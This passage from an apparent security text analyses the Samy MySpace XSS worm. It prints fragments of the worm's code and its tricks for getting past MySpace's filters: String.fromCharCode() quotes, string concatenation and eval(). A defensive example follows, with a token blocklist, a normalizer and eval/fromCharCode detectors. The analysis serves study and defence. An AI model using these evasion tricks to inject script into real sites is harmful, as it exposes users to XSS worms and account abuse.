addFriendsProcess to add user
11851658 (Samy) to the victimized friend list. This completes the core functionality of
the SAMY worm.
Samy's Supporting Variables and Functions
Some of the functions shown in the preceding code call other functions within the worm.
For completeness, we present the rest of the worm code. This code contains some interesting
tricks to circumvent MySpace's security controls such as using String.fromCharCode()
and obfuscating blocked strings with string concatenation and the eval() function.
// Samy needed double quotes and single quotes, but was not able to place
// them in the code. So he grabs the characters through
// String.fromCharCode().
var doubleQuote = String.fromCharCode(34); // 34 == "
var singleQuote = String.fromCharCode(39); // 39 == '
// Create a TextRange object in order to grab the HTML body of the page that
// this function is running on. This is equivalent to
// document.body.innerHTML.
// Interestingly, createTextRange() is IE specific, and since the script
// injection is IE specific, he could have shortened this code drastically to
// simply "var getHtmlBody = document.body.createTextRange().htmlText;"
function getHtmlBody() {
    var htmlBody;
    try {
        var textRange = document.
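
As an added example (not code from the book or from the worm), the following shows the filter-side view of the String.fromCharCode() and string-concatenation tricks described above: a literal-string blocklist misses the split tokens, while the same check run on normalized text finds them. The blocklist entries, function names and sample input are constructed for illustration; the page does not list which strings MySpace actually blocked.

```javascript
// Assumed blocklist for illustration only (not MySpace's real list).
const BLOCKED = ['innerHTML', 'onreadystatechange'];

// Constructed sample of user-submitted script that hides blocked tokens
// with string concatenation, eval() and String.fromCharCode().
const SAMPLE =
  "var b = eval('document.body.inne' + 'rHTML');\n" +
  "var h = String.fromCharCode(111,110,114,101,97,100,121) + 'statechange';";

// Naive filter: match blocked tokens against the raw text as submitted.
function naiveFilter(src) {
  return BLOCKED.filter(tok => src.includes(tok));
}

// Normalize text for matching (a heuristic, not a JavaScript parser):
//  1. replace String.fromCharCode(<numeric literals>) with the quoted
//     characters it would produce;
//  2. delete `'...' + '...'` joins so split literals become one string.
// The output is only used for matching, so over-merging is acceptable.
function normalize(src) {
  const decoded = src.replace(
    /String\s*\.\s*fromCharCode\s*\(\s*([0-9xXa-fA-F,\s]+?)\s*\)/g,
    (_, args) =>
      "'" + args.split(',').map(n => String.fromCharCode(Number(n))).join('') + "'"
  );
  return decoded.replace(/['"]\s*\+\s*['"]/g, '');
}

// Filter that runs the same blocklist over the normalized text.
function normalizedFilter(src) {
  const text = normalize(src);
  return BLOCKED.filter(tok => text.includes(tok));
}

// Constructs that build code or strings at run time are worth flagging on
// their own, because no static normalizer can fold every case.
function dynamicIndicators(src) {
  const found = [];
  if (/\beval\s*\(/.test(src)) found.push('eval');
  if (/String\s*\.\s*fromCharCode/.test(src)) found.push('fromCharCode');
  return found;
}

console.log('naive hits:     ', naiveFilter(SAMPLE));
console.log('normalized hits:', normalizedFilter(SAMPLE));
console.log('indicators:     ', dynamicIndicators(SAMPLE));
```

Normalization of this kind narrows the gap but does not close it, which is why allowlist sanitization and output encoding are preferred over token blocklists.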